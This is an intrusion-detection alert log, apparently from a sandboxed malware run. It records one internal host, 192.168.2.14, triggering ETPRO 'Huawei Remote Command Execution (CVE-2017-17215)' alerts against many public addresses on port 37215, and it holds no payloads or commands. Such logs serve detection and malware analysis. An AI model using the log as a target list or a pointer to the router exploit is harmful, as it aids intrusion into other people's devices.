                                            06/14/24-10:44:02.368441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414237215192.168.2.14197.58.124.154
                                            06/14/24-10:44:10.568180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296237215192.168.2.14156.100.24.37
                                            06/14/24-10:43:56.246207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099837215192.168.2.1441.59.40.45
                                            06/14/24-10:43:50.074628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008237215192.168.2.1441.118.204.16
                                            06/14/24-10:43:41.849607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812437215192.168.2.1441.31.222.132
                                            06/14/24-10:43:36.700803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080637215192.168.2.14197.176.156.206
                                            06/14/24-10:43:41.906203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755237215192.168.2.1441.251.171.133
                                            06/14/24-10:43:39.792307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681037215192.168.2.14156.115.247.76
                                            06/14/24-10:43:36.699691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304037215192.168.2.14197.218.110.112
                                            06/14/24-10:44:31.054514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4145037215192.168.2.1441.27.84.195
                                            06/14/24-10:44:22.881299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599037215192.168.2.14156.103.181.58
                                            06/14/24-10:43:56.244902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582037215192.168.2.1441.105.106.255
                                            06/14/24-10:43:56.227671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680637215192.168.2.14197.243.87.36
                                            06/14/24-10:44:18.763193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941837215192.168.2.14197.173.53.125
                                            06/14/24-10:44:02.367859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550437215192.168.2.14197.224.22.162
                                            06/14/24-10:43:45.968681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065437215192.168.2.14197.224.158.154
                                            06/14/24-10:44:04.421692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425037215192.168.2.14156.195.80.217
                                            06/14/24-10:44:24.915667TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339037215192.168.2.14197.57.255.1
                                            06/14/24-10:43:34.678513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426037215192.168.2.1441.55.199.105
                                            06/14/24-10:43:41.897141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961837215192.168.2.14156.178.68.22
                                            06/14/24-10:43:39.792818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885837215192.168.2.1441.68.190.70
                                            06/14/24-10:43:41.849456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037037215192.168.2.1441.99.18.70
                                            06/14/24-10:44:10.547702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573237215192.168.2.14156.116.9.6
                                            06/14/24-10:44:04.420690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500437215192.168.2.1441.186.25.122
                                            06/14/24-10:44:06.452780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752837215192.168.2.1441.211.60.2
                                            06/14/24-10:43:43.944413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792837215192.168.2.1441.188.237.90
                                            06/14/24-10:43:56.242407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964637215192.168.2.14197.232.4.152
                                            06/14/24-10:44:06.469682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5377037215192.168.2.14197.23.142.71
                                            06/14/24-10:44:24.941883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430837215192.168.2.1441.132.218.190
                                            06/14/24-10:44:10.581581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051837215192.168.2.14197.228.215.94
                                            06/14/24-10:44:26.986209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4670237215192.168.2.14197.42.180.241
                                            06/14/24-10:43:41.907254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997837215192.168.2.14197.11.141.39
                                            06/14/24-10:44:24.916665TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790437215192.168.2.1441.67.197.10
                                            06/14/24-10:43:48.018729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829637215192.168.2.14197.12.204.244
                                            06/14/24-10:44:08.519173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839837215192.168.2.1441.37.66.158
                                            06/14/24-10:44:20.805425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771237215192.168.2.1441.196.124.57
                                            06/14/24-10:43:52.150295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420237215192.168.2.14156.136.117.83
                                            06/14/24-10:44:08.518638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508237215192.168.2.14197.15.251.160
                                            06/14/24-10:44:20.827923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709837215192.168.2.1441.236.87.5
                                            06/14/24-10:43:43.968956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246437215192.168.2.14197.214.42.67
                                            06/14/24-10:43:39.790472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025637215192.168.2.14197.212.160.21
                                            06/14/24-10:44:29.022414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5250237215192.168.2.14156.198.86.176
                                            06/14/24-10:43:41.850403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422637215192.168.2.14156.198.9.13
                                            06/14/24-10:43:54.198582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637437215192.168.2.1441.163.64.40
                                            06/14/24-10:44:02.367176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409037215192.168.2.14197.205.109.32
                                            06/14/24-10:43:45.967114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788037215192.168.2.14156.38.36.137
                                            06/14/24-10:44:16.718780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219437215192.168.2.14156.195.93.158
                                            06/14/24-10:43:45.984617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219637215192.168.2.14156.191.196.193
                                            06/14/24-10:44:06.451648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050037215192.168.2.14197.130.151.50
                                            06/14/24-10:44:14.682982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4412037215192.168.2.1441.156.2.29
                                            06/14/24-10:43:54.198241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4286437215192.168.2.1441.186.23.148
                                            06/14/24-10:44:08.520257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079037215192.168.2.1441.215.88.8
                                            06/14/24-10:43:45.984392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094237215192.168.2.1441.54.22.190
                                            06/14/24-10:43:41.898449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787837215192.168.2.1441.66.9.35
                                            06/14/24-10:44:18.777669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5249037215192.168.2.14197.112.250.157
                                            06/14/24-10:43:39.792931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460437215192.168.2.14156.254.54.61
                                            06/14/24-10:44:12.645783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449037215192.168.2.14197.218.245.79
                                            06/14/24-10:43:45.967767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427637215192.168.2.1441.135.157.42
                                            06/14/24-10:43:48.034375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4813237215192.168.2.14156.198.72.98
                                            06/14/24-10:44:29.024386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553037215192.168.2.1441.78.209.16
                                            06/14/24-10:44:35.180948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365237215192.168.2.1441.93.119.70
                                            06/14/24-10:43:56.246061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136037215192.168.2.14156.140.254.183
                                            06/14/24-10:44:16.733099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001237215192.168.2.14197.122.7.228
                                            06/14/24-10:44:24.933359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698837215192.168.2.14197.54.107.212
                                            06/14/24-10:43:56.253182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529037215192.168.2.1441.53.29.66
                                            06/14/24-10:43:39.812067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244237215192.168.2.14156.4.192.161
                                            06/14/24-10:44:10.549294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5550037215192.168.2.14156.120.161.148
                                            06/14/24-10:44:16.715432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209437215192.168.2.14197.179.88.33
                                            06/14/24-10:43:58.290162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083637215192.168.2.14156.198.218.5
                                            06/14/24-10:44:08.517537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120437215192.168.2.1441.249.178.97
                                            06/14/24-10:44:16.735594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252837215192.168.2.14197.37.159.10
                                            06/14/24-10:43:48.022299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092637215192.168.2.1441.64.43.196
                                            06/14/24-10:44:10.582210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4777037215192.168.2.14197.195.190.4
                                            06/14/24-10:43:36.727895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124837215192.168.2.14197.153.188.163
                                            06/14/24-10:43:50.075270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852637215192.168.2.1441.7.32.107
                                            06/14/24-10:44:14.669129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954237215192.168.2.14156.152.69.116
                                            06/14/24-10:44:18.763789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635437215192.168.2.14197.7.124.250
                                            06/14/24-10:43:41.846984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723037215192.168.2.1441.249.153.240
                                            06/14/24-10:43:48.017636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479837215192.168.2.1441.162.98.171
                                            06/14/24-10:43:50.072152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568637215192.168.2.14156.192.177.102
                                            06/14/24-10:43:58.273233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5580037215192.168.2.14197.92.157.81
                                            06/14/24-10:44:14.686539TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350637215192.168.2.14156.33.44.179
                                            06/14/24-10:43:43.942993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5010437215192.168.2.14197.106.167.170
                                            06/14/24-10:43:58.275465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980037215192.168.2.14197.38.13.75
                                            06/14/24-10:43:43.970776TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348837215192.168.2.14197.139.184.183
                                            06/14/24-10:44:33.132490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022837215192.168.2.14197.160.153.170
                                            06/14/24-10:43:48.031245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442437215192.168.2.1441.205.210.186
                                            06/14/24-10:43:56.226886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010837215192.168.2.1441.127.234.34
                                            06/14/24-10:44:18.766566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4442637215192.168.2.14197.233.160.146
                                            06/14/24-10:44:31.056095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235637215192.168.2.14197.43.51.200
                                            06/14/24-10:44:10.568223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583837215192.168.2.14197.59.23.142
                                            06/14/24-10:44:20.831205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387237215192.168.2.14156.108.200.159
                                            06/14/24-10:44:08.504192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671837215192.168.2.1441.152.71.253
                                            06/14/24-10:43:48.017586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996837215192.168.2.14156.203.55.200
                                            06/14/24-10:43:50.070755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5708237215192.168.2.14156.91.88.69
                                            06/14/24-10:44:22.879079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707837215192.168.2.14156.206.143.249
                                            06/14/24-10:43:41.850138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686637215192.168.2.1441.31.131.18
                                            06/14/24-10:44:22.861461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563237215192.168.2.14156.76.176.205
                                            06/14/24-10:43:56.244960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6079837215192.168.2.1441.165.73.216
                                            06/14/24-10:44:14.684131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997637215192.168.2.1441.247.51.162
                                            06/14/24-10:44:31.094696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674237215192.168.2.14197.153.236.215
                                            06/14/24-10:44:35.178404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3537637215192.168.2.14197.170.81.224
                                            06/14/24-10:43:50.073372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893837215192.168.2.1441.11.248.117
                                            06/14/24-10:44:18.761192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807237215192.168.2.14156.180.39.52
                                            06/14/24-10:44:29.027371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890237215192.168.2.14156.16.133.25
                                            06/14/24-10:44:00.323400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240637215192.168.2.14156.9.145.253
                                            06/14/24-10:44:04.412181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3430437215192.168.2.14197.204.204.195
                                            06/14/24-10:43:34.663231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658637215192.168.2.1441.59.10.212
                                            06/14/24-10:43:50.074789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933437215192.168.2.14197.74.203.95
                                            06/14/24-10:43:56.230191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3834037215192.168.2.14197.236.209.207
                                            06/14/24-10:44:02.368548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3508237215192.168.2.14197.244.246.193
                                            06/14/24-10:44:16.714950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314837215192.168.2.1441.102.234.236
                                            06/14/24-10:44:14.687123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4835437215192.168.2.14197.229.158.192
                                            06/14/24-10:44:10.569363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282637215192.168.2.14156.208.130.201
                                            06/14/24-10:43:54.200463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446437215192.168.2.1441.145.229.71
                                            06/14/24-10:44:18.779963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854637215192.168.2.14156.48.55.218
                                            06/14/24-10:43:34.676820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3545837215192.168.2.1441.206.192.149
                                            06/14/24-10:43:45.968549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6049837215192.168.2.1441.49.134.243
                                            06/14/24-10:44:00.337076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941637215192.168.2.14156.58.33.183
                                            06/14/24-10:44:35.179454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708437215192.168.2.14197.248.93.41
                                            06/14/24-10:43:45.992494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5994837215192.168.2.14156.192.0.152
                                            06/14/24-10:44:10.547319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5064437215192.168.2.1441.114.2.222
                                            06/14/24-10:44:00.325089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5397437215192.168.2.14156.13.75.198
                                            06/14/24-10:44:24.944335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176837215192.168.2.1441.179.13.38
                                            06/14/24-10:43:34.678262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304237215192.168.2.14156.41.216.245
                                            06/14/24-10:44:20.807305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5461037215192.168.2.1441.12.205.132
                                            06/14/24-10:44:14.667399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578837215192.168.2.14197.163.5.191
                                            06/14/24-10:43:48.017467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569237215192.168.2.14156.70.59.154
                                            06/14/24-10:43:58.276940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938437215192.168.2.1441.189.123.129
                                            06/14/24-10:44:24.913739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4431437215192.168.2.1441.245.168.129
                                            06/14/24-10:43:58.293020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740037215192.168.2.1441.24.49.33
                                            06/14/24-10:44:12.614567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281437215192.168.2.14197.214.231.17
                                            06/14/24-10:44:26.980621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861037215192.168.2.14156.54.15.44
                                            06/14/24-10:43:34.678225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550637215192.168.2.14197.150.58.36
                                            06/14/24-10:44:33.135224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4548037215192.168.2.1441.12.226.94
                                            06/14/24-10:43:43.943292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731637215192.168.2.14197.237.95.32
                                            06/14/24-10:44:00.337004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554237215192.168.2.1441.172.129.201
                                            06/14/24-10:44:33.134056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752837215192.168.2.14156.180.161.134
                                            06/14/24-10:43:37.760565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715637215192.168.2.1441.161.95.168
                                            06/14/24-10:43:36.718489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342437215192.168.2.1441.57.133.165
                                            06/14/24-10:43:39.791628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844037215192.168.2.14197.36.37.62
                                            06/14/24-10:43:45.967006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024637215192.168.2.14156.100.130.131
                                            06/14/24-10:43:48.045951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575837215192.168.2.14197.123.229.67
                                            06/14/24-10:44:16.733666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285837215192.168.2.1441.126.88.224
                                            06/14/24-10:44:06.472129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846237215192.168.2.1441.111.103.151
                                            06/14/24-10:43:41.850390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3449437215192.168.2.14197.52.64.141
                                            06/14/24-10:44:06.453432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3588237215192.168.2.14156.117.156.189
                                            06/14/24-10:44:22.859551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284037215192.168.2.14156.30.49.245
                                            06/14/24-10:43:48.019223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499637215192.168.2.14197.217.132.207
                                            06/14/24-10:44:18.760932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4545037215192.168.2.1441.226.155.82
                                            06/14/24-10:44:20.828512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3572237215192.168.2.14156.108.226.3
                                            06/14/24-10:44:00.321301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046037215192.168.2.14197.212.73.75
                                            06/14/24-10:44:22.881024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243037215192.168.2.14197.162.189.80
                                            06/14/24-10:43:48.033054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616237215192.168.2.14197.106.235.126
                                            06/14/24-10:44:00.323589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4376037215192.168.2.1441.201.89.127
                                            06/14/24-10:44:06.452516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5421637215192.168.2.14156.23.166.36
                                            06/14/24-10:43:37.762911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3709037215192.168.2.14156.143.248.78
                                            06/14/24-10:43:54.203226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023437215192.168.2.14197.23.15.209
                                            06/14/24-10:44:26.998615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725437215192.168.2.14156.12.99.8
                                            06/14/24-10:44:20.805942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806237215192.168.2.1441.97.255.133
                                            06/14/24-10:44:20.806635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720837215192.168.2.14156.246.178.4
                                            06/14/24-10:44:00.343279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956437215192.168.2.1441.230.249.72
                                            06/14/24-10:44:35.180332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721637215192.168.2.14197.87.232.194
                                            06/14/24-10:44:14.689360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5060037215192.168.2.14197.129.155.113
                                            06/14/24-10:43:34.662023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295237215192.168.2.14197.33.230.71
                                            06/14/24-10:44:31.052026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333837215192.168.2.14156.155.68.159
                                            06/14/24-10:44:00.325202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041837215192.168.2.14156.59.220.205
                                            06/14/24-10:44:31.050916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118437215192.168.2.1441.104.82.85
                                            06/14/24-10:43:37.760077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4896837215192.168.2.14197.122.200.220
                                            06/14/24-10:43:39.792336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678237215192.168.2.1441.86.191.225
                                            06/14/24-10:44:10.544356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827637215192.168.2.14197.234.183.226
                                            06/14/24-10:43:54.202877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5041437215192.168.2.14197.162.242.42
                                            06/14/24-10:44:00.341543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875837215192.168.2.14197.124.78.93
                                            06/14/24-10:44:31.087747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5667237215192.168.2.1441.216.3.183
                                            06/14/24-10:43:56.229320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636837215192.168.2.14197.89.68.180
                                            06/14/24-10:44:06.471551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5179437215192.168.2.14197.3.128.165
                                            06/14/24-10:44:33.133207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432637215192.168.2.14156.243.61.149
                                            06/14/24-10:44:16.733335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291837215192.168.2.1441.94.117.243
                                            06/14/24-10:44:20.805690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4344637215192.168.2.14197.191.32.41
                                            06/14/24-10:44:04.409151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4647037215192.168.2.14156.200.181.48
                                            06/14/24-10:44:14.688795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230637215192.168.2.1441.145.255.156
                                            06/14/24-10:44:14.669919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614437215192.168.2.14156.36.47.47
                                            06/14/24-10:44:33.148878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4242237215192.168.2.14156.192.205.22
                                            06/14/24-10:44:14.685486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549637215192.168.2.14156.244.89.69
                                            06/14/24-10:44:24.914076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4905837215192.168.2.14156.36.255.0
                                            06/14/24-10:43:41.847555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465837215192.168.2.14197.174.4.170
                                            06/14/24-10:44:33.150381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891037215192.168.2.14156.127.66.202
                                            06/14/24-10:43:52.165256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3474637215192.168.2.14197.44.69.61
